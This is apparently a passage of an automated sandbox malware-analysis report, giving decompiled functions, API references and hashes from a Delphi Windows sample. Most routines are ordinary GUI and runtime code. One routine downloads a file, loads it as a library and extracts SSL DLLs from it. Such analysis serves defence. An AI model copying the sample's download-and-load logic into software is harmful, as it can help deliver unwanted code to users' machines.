                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                                                                                                                                                                                                            • String ID: `C$tC
                                                                                                                                                                                                                            • API String ID: 2049660638-2788972245
                                                                                                                                                                                                                            • Opcode ID: 0eb7b7183224f25ed9cd336059e391895cb8aedaaf37bee30aa456c4423d9d4d
                                                                                                                                                                                                                            • Instruction ID: 3581ce7dd3e3bfbf2e623d4eb096478338c089ca1b68be53d8a0d9a7386b4eb1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0eb7b7183224f25ed9cd336059e391895cb8aedaaf37bee30aa456c4423d9d4d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6515F75A002099FCB10DFA9C481BAEB7F4AF08354F14516AF855EB351DB38ED41CB9A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetActiveWindow.USER32 ref: 0045A8B7
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 0045A911
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045A949
                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 0045A98A
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045AA00,?,00000000,0045A9F9), ref: 0045A9DA
                                                                                                                                                                                                                            • SetActiveWindow.USER32(?,0045AA00,?,00000000,0045A9F9), ref: 0045A9EB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                             • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                             • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Active$MessageRect
                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                            • API String ID: 3147912190-3887548279
                                                                                                                                                                                                                            • Opcode ID: 8cef1ea23398dab616a7e991724775971796e361134f7c3a3b04aaf4b6622f78
                                                                                                                                                                                                                            • Instruction ID: aa5883e2080ee4b6071f7524ee1856c0ab285683fbf4ba5b2f0a51d728674732
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cef1ea23398dab616a7e991724775971796e361134f7c3a3b04aaf4b6622f78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35414EB5E00108AFDB04DBA9CD85FAE77F9FB48305F14456AF900E7392D674AD048B55
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00428300(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				BYTE* _v16;
                                                                                                                                                                                                                            				intOrPtr _v18;
                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                            				short _v26;
                                                                                                                                                                                                                            				short _v28;
                                                                                                                                                                                                                            				short _v30;
                                                                                                                                                                                                                            				short _v32;
                                                                                                                                                                                                                            				char _v38;
                                                                                                                                                                                                                            				struct tagMETAFILEPICT _v54;
                                                                                                                                                                                                                            				intOrPtr _v118;
                                                                                                                                                                                                                            				intOrPtr _v122;
                                                                                                                                                                                                                            				struct tagENHMETAHEADER _v154;
                                                                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                                                                            				intOrPtr _t115;
                                                                                                                                                                                                                            				struct HENHMETAFILE__* _t119;
                                                                                                                                                                                                                            				struct HENHMETAFILE__* _t120;
                                                                                                                                                                                                                            				void* _t122;
                                                                                                                                                                                                                            				void* _t123;
                                                                                                                                                                                                                            				void* _t124;
                                                                                                                                                                                                                            				void* _t125;
                                                                                                                                                                                                                            				intOrPtr _t126;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t124 = _t125;
                                                                                                                                                                                                                            				_t126 = _t125 + 0xffffff68;
                                                                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t122 = __eax;
                                                                                                                                                                                                                            				E0042819C(__eax);
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
                                                                                                                                                                                                                            				if(_v38 != 0x9ac6cdd7 || E00426DA8( &_v38) != _v18) {
                                                                                                                                                                                                                            					E00425F58();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v12 = _v12 - 0x16;
                                                                                                                                                                                                                            				_v16 = E0040275C(_v12);
                                                                                                                                                                                                                            				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                                                                                                                                                                                                            				 *[fs:eax] = _t126;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42846f, _t124);
                                                                                                                                                                                                                            				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                                                                                                                                                                                                            				if(_v24 == 0) {
                                                                                                                                                                                                                            					_v24 = 0x60;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                                                                                                                                                                                                            				_v54.mm = 8;
                                                                                                                                                                                                                            				_v54.xExt = 0;
                                                                                                                                                                                                                            				_v54.yExt = 0;
                                                                                                                                                                                                                            				_v54.hMF = 0;
                                                                                                                                                                                                                            				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                                                                                                                                                                            				 *(_t103 + 8) = _t119;
                                                                                                                                                                                                                            				if(_t119 == 0) {
                                                                                                                                                                                                                            					E00425F58();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                                                                                                                                                                                                            				_v54.mm = 8;
                                                                                                                                                                                                                            				_v54.xExt = _v122;
                                                                                                                                                                                                                            				_v54.yExt = _v118;
                                                                                                                                                                                                                            				_v54.hMF = 0;
                                                                                                                                                                                                                            				DeleteEnhMetaFile( *(_t103 + 8));
                                                                                                                                                                                                                            				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                                                                                                                                                                            				 *(_t103 + 8) = _t120;
                                                                                                                                                                                                                            				if(_t120 == 0) {
                                                                                                                                                                                                                            					E00425F58();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((char*)(_t122 + 0x2c)) = 0;
                                                                                                                                                                                                                            				_pop(_t115);
                                                                                                                                                                                                                            				 *[fs:eax] = _t115;
                                                                                                                                                                                                                            				_push(0x428476);
                                                                                                                                                                                                                            				return E0040277C(_v16);
                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                            0x004283c7
                                                                                                                                                                                                                            0x004283d0
                                                                                                                                                                                                                            0x004283d5
                                                                                                                                                                                                                            0x004283da
                                                                                                                                                                                                                            0x004283f0
                                                                                                                                                                                                                            0x004283f2
                                                                                                                                                                                                                            0x004283f7
                                                                                                                                                                                                                            0x004283f9
                                                                                                                                                                                                                            0x004283f9
                                                                                                                                                                                                                            0x0042840b
                                                                                                                                                                                                                            0x00428410
                                                                                                                                                                                                                            0x0042841a
                                                                                                                                                                                                                            0x00428420
                                                                                                                                                                                                                            0x00428425
                                                                                                                                                                                                                            0x0042842c
                                                                                                                                                                                                                            0x00428444
                                                                                                                                                                                                                            0x00428446
                                                                                                                                                                                                                            0x0042844b
                                                                                                                                                                                                                            0x0042844d
                                                                                                                                                                                                                            0x0042844d
                                                                                                                                                                                                                            0x00428452
                                                                                                                                                                                                                            0x00428458
                                                                                                                                                                                                                            0x0042845b
                                                                                                                                                                                                                            0x0042845e
                                                                                                                                                                                                                            0x0042846e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283A2
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283BF
                                                                                                                                                                                                                            • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004283EB
                                                                                                                                                                                                                            • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042840B
                                                                                                                                                                                                                            • DeleteEnhMetaFile.GDI32(00000016), ref: 0042842C
                                                                                                                                                                                                                            • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0042843F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileMeta$Bits$DeleteHeader
                                                                                                                                                                                                                            • String ID: `
                                                                                                                                                                                                                            • API String ID: 1990453761-2679148245
                                                                                                                                                                                                                            • Opcode ID: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                                                                                                                                                                                            • Instruction ID: d131a5009b9ae6a1c3985c7f4bbb4479256416dcbb727d86a178af25fe9cd39a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7410F75E00218AFDB00DFA9D485AAEB7F9EF48710F50846AF904F7281E7799D40CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E00495084(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                            				intOrPtr _t79;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t82;
                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                            				intOrPtr _t87;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_push(_t87);
                                                                                                                                                                                                                            				_push(0x4951d4);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t87;
                                                                                                                                                                                                                            				_t84 = 3;
                                                                                                                                                                                                                            				_t55 = 0x49f0f4;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					if( *_t55 == 0) {
                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t68 =  *0x49f100; // 0x0
                                                                                                                                                                                                                            						E00404CCC( &_v12, "\\SSLLibrary.ddl", _t68);
                                                                                                                                                                                                                            						if(E00474D50( *_t55, _t55, _v12, _t84) == 0) {
                                                                                                                                                                                                                            							_v5 = 0;
                                                                                                                                                                                                                            							goto L5;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_v5 = 1;
                                                                                                                                                                                                                            							_t72 =  *0x49f100; // 0x0
                                                                                                                                                                                                                            							E00404CCC( &_v16, "\\SSLLibrary.ddl", _t72);
                                                                                                                                                                                                                            							_t82 = LoadLibraryA(E00404E80(_v16));
                                                                                                                                                                                                                            							_t56 = E0041E0D0(_t82, 1, 0xa, "LIBEAY32");
                                                                                                                                                                                                                            							_t74 =  *0x49f100; // 0x0
                                                                                                                                                                                                                            							E00404CCC( &_v20, "\\libeay32.dll", _t74);
                                                                                                                                                                                                                            							E0041DD9C(_t30, _t56, _v20, _t82);
                                                                                                                                                                                                                            							E00403BEC(_t56);
                                                                                                                                                                                                                            							_t57 = E0041E0D0(_t82, 1, 0xa, "SSLEAY32");
                                                                                                                                                                                                                            							_t77 =  *0x49f100; // 0x0
                                                                                                                                                                                                                            							E00404CCC( &_v24, "\\ssleay32.dll", _t77);
                                                                                                                                                                                                                            							E0041DD9C(_t38, _t57, _v24, _t82);
                                                                                                                                                                                                                            							E00403BEC(_t57);
                                                                                                                                                                                                                            							FreeLibrary(_t82);
                                                                                                                                                                                                                            							_t79 =  *0x49f100; // 0x0
                                                                                                                                                                                                                            							E00404CCC( &_v32, "\\SSLLibrary.ddl", _t79);
                                                                                                                                                                                                                            							E00404BB8( &_v28, E00404E80(_v32));
                                                                                                                                                                                                                            							E00409BAC(_v28);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					_t55 = _t55 + 4;
                                                                                                                                                                                                                            					_t84 = _t84 - 1;
                                                                                                                                                                                                                            				} while (_t84 != 0);
                                                                                                                                                                                                                            				_pop(_t70);
                                                                                                                                                                                                                            				 *[fs:eax] = _t70;
                                                                                                                                                                                                                            				_push(0x4951db);
                                                                                                                                                                                                                            				return E004049E4( &_v32, 6);
                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetCloseHandle.WININET(?), ref: 00474E6E
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004950F9
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,0000000A,SSLEAY32,0000000A,LIBEAY32,00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00495177
                                                                                                                                                                                                                              • Part of subcall function 00409BAC: DeleteFileA.KERNEL32(00000000,0049C9B0,00475D16,00000000,00475D3C), ref: 00409BB7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$FileLibraryOpen$CloseDeleteFreeHandleLoadRead
                                                                                                                                                                                                                            • String ID: LIBEAY32$SSLEAY32$\SSLLibrary.ddl$\libeay32.dll$\ssleay32.dll
                                                                                                                                                                                                                            • API String ID: 1893608559-2695981766
                                                                                                                                                                                                                            • Opcode ID: b9b64cd10222cbfc43811778c3e9705247d2973ed7e941e70c5c3ecfe2b2726d
                                                                                                                                                                                                                            • Instruction ID: 33ec969f5ea1b72477d048da23142bfffb93f2672bd1290969d982d35f2b6f3b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9b64cd10222cbfc43811778c3e9705247d2973ed7e941e70c5c3ecfe2b2726d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0319870B042049BDB01EB65DC82BAF7B75EB94304F20857BE901A7392DB7DAD05879C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 44%
                                                                                                                                                                                                                            			E00421900(char __edx) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				long _t11;
                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                            				intOrPtr* _t36;
                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                            				void* _t44;
                                                                                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t42 = _t44;
                                                                                                                                                                                                                            				_t45 = _t44 + 0xfffffff4;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t11 = GetCurrentThreadId();
                                                                                                                                                                                                                            				_t36 =  *0x49de40; // 0x49e034
                                                                                                                                                                                                                            				if(_t11 !=  *_t36) {
                                                                                                                                                                                                                            					_v12 = CreateEventA(0, 0xffffffff, 0, 0);
                                                                                                                                                                                                                            					_push(_t42);
                                                                                                                                                                                                                            					_push(0x421a22);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t45;
                                                                                                                                                                                                                            					_push(0x49e86c);
                                                                                                                                                                                                                            					L00406FE0();
                                                                                                                                                                                                                            					_push(_t42);
                                                                                                                                                                                                                            					_push(0x421a04);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t45;
                                                                                                                                                                                                                            					if(E0049B5C4 == 0) {
                                                                                                                                                                                                                            						E0049B5C4 = E00403BBC(1);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v16 = _v8;
                                                                                                                                                                                                                            					_t16 = E0049B5C4; // 0x0
                                                                                                                                                                                                                            					E0041AB10(_t16,  &_v16);
                                                                                                                                                                                                                            					E00421494();
                                                                                                                                                                                                                            					if( *0x49b532 != 0) {
                                                                                                                                                                                                                            						 *0x49b530();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(0x49e86c);
                                                                                                                                                                                                                            					L004071A0();
                                                                                                                                                                                                                            					_push(_t42);
                                                                                                                                                                                                                            					_push(0x4219e5);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t45;
                                                                                                                                                                                                                            					WaitForSingleObject(_v12, 0xffffffff);
                                                                                                                                                                                                                            					_pop(_t38);
                                                                                                                                                                                                                            					 *[fs:eax] = _t38;
                                                                                                                                                                                                                            					_push(0x4219ec);
                                                                                                                                                                                                                            					_push(0x49e86c);
                                                                                                                                                                                                                            					L00406FE0();
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t29 =  *((intOrPtr*)(_v8 + 8))();
                                                                                                                                                                                                                            					return _t29;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0042190A
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 0042192F
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E86C,00000000,00421A22,?,00000000,000000FF,00000000,00000000), ref: 0042194A
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E86C,00000000,00421A04,?,0049E86C,00000000,00421A22,?,00000000,000000FF,00000000,00000000), ref: 004219AF
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,004219E5,?,0049E86C,00000000,00421A04,?,0049E86C,00000000,00421A22,?,00000000,000000FF,00000000), ref: 004219C8
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E86C,004219EC,004219E5,?,0049E86C,00000000,00421A04,?,0049E86C,00000000,00421A22,?,00000000,000000FF,00000000,00000000), ref: 004219DF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$Enter$CreateCurrentEventLeaveObjectSingleThreadWait
                                                                                                                                                                                                                            • String ID: 4I
                                                                                                                                                                                                                            • API String ID: 1504017990-2364942553
                                                                                                                                                                                                                            • Opcode ID: 292f5edd8ce152165e351f987fd279c188195222a31a90e638a1b1ddc32d9408
                                                                                                                                                                                                                            • Instruction ID: c735307bb3b187497a5fd69113a8ab7abc351a98bda77d86b61d484baaaa887a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 292f5edd8ce152165e351f987fd279c188195222a31a90e638a1b1ddc32d9408
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C21B230A00204AFCB01EF55ED92E597BB4EB19728FA145BBF400977E0DB796C10CA59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E0042C82C(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                                                                                                                                                                                                            				void _v20;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                            				struct HMONITOR__* _t27;
                                                                                                                                                                                                                            				struct tagMONITORINFO* _t29;
                                                                                                                                                                                                                            				intOrPtr* _t31;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t29 = _a8;
                                                                                                                                                                                                                            				_t27 = _a4;
                                                                                                                                                                                                                            				if( *0x49e92c != 0) {
                                                                                                                                                                                                                            					_t24 = 0;
                                                                                                                                                                                                                            					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                                                                                                                                                                            						_t29->rcMonitor.left = 0;
                                                                                                                                                                                                                            						_t29->rcMonitor.top = 0;
                                                                                                                                                                                                                            						_t29->rcMonitor.right = GetSystemMetrics(0);
                                                                                                                                                                                                                            						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						_t31 = _t29;
                                                                                                                                                                                                                            						 *(_t31 + 0x24) = 1;
                                                                                                                                                                                                                            						if( *_t31 >= 0x4c) {
                                                                                                                                                                                                                            							_push("DISPLAY");
                                                                                                                                                                                                                            							_push(_t31 + 0x28);
                                                                                                                                                                                                                            							L00407298();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t24 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *0x49e910 = E0042C4FC(4, _t23,  *0x49e910, _t27, _t29);
                                                                                                                                                                                                                            					_t24 = GetMonitorInfoA(_t27, _t29);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetMonitorInfoA.USER32(?,?), ref: 0042C85D
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C884
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C899
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C8A4
                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C8CE
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                                                                                                                                                            • String ID: DISPLAY$GetMonitorInfo
                                                                                                                                                                                                                            • API String ID: 1539801207-1633989206
                                                                                                                                                                                                                            • Opcode ID: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                                                                                                                                                                                            • Instruction ID: fd539ca8d8add89cf6c2a40af9093eb6b2d142832e41177ff4ac11c4fa6a4bef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3211E4B17013109FD720EF66AC84BABB7E9EB05712F40893BE815D7240D3B5A900CBA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00406B91(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                                                                                                                                                                                            				long _t11;
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t16 = __ebx;
                                                                                                                                                                                                                            				 *__edi =  *__edi + __ecx;
                                                                                                                                                                                                                            				 *((intOrPtr*)(__eax - 0x49e5bc)) =  *((intOrPtr*)(__eax - 0x49e5bc)) + __eax - 0x49e5bc;
